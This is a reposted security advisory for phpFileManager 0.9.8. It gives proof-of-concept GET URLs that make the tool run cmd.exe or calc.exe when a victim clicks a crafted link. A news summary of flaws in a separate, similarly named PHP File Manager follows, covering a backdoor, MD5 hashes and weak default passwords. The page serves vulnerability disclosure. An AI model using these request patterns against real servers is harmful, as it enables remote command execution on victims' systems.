phpFileManager 0.9.8 Remote Command Execution






phpFileManager 0.9.8 Remote Command Execution







Description:


phpFileManager is a complete filesystem management tool on a single file. Features: server info, directory tree, copy/move/delete/create/rename/edit/view/chmod files and folders, tar/zip/bzip/gzip, multiple uploads, shell/exec, works on linux/windows




Features


  • server info
  • directory tree
  • copy/move/delete/create/rename/edit/view/chmod files and folders
  • tar/zip/bzip/gzip
  • multiple uploads
  • shell/exec
  • works on linux/windows

Exploits 

 PHPFileManager is vulnerable to remote command execution and will call operating system commands via GET requests from a victims browser. By getting the victim to click our malicious link or visit our malicious website.

Exploit code(s):
===============


Remote Command Execution:
-------------------------

1- call Windows cmd.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe


2- Run Windows calc.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe

 


Source from : 
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt
 


 
 
 


 

 

PHP File Manager – Multiple Critical Security Vulnerabilities ( Including Backdoor! )

 

PHP File Manager – Multiple Critical Security Vulnerabilities ( Including Backdoor! )

According to Sijmen Ruwhof ( https://twitter.com/sruwhof ) , a security consultant and penetration tester based in the Netherlands, some of the issues have been present in the software for the last five years. After three failed attempts to get in touch with Revived Wire Media, the Virginia-based company behind the product, Ruwhof opted on Monday to disclose the issues publicly – See more at: http://seclists.org/fulldisclosure/2015/Jul/117


Hit Login Button


“Password hashes stored in the user database are unsalted and are generated via the deprecated MD5 hash algorithm,” Ruwhof said. He explained that an attacker could revert the hashes to their original passwords using an online MD5 reversing service.

The file manager also has a weak password strength policy, a lack of variation in default passwords and measures that don’t force the user to change default passwords. Other flaws include an unsecured backdoor, the ability for users to upload arbitrary and unauthenticated files, and no configuration to restrict file extensions.

Source : http://sijmen.ruwhof.net/weblog/411-multiple-critical-security-vulnerabilities-including-a-backdoor-in-php-file-manager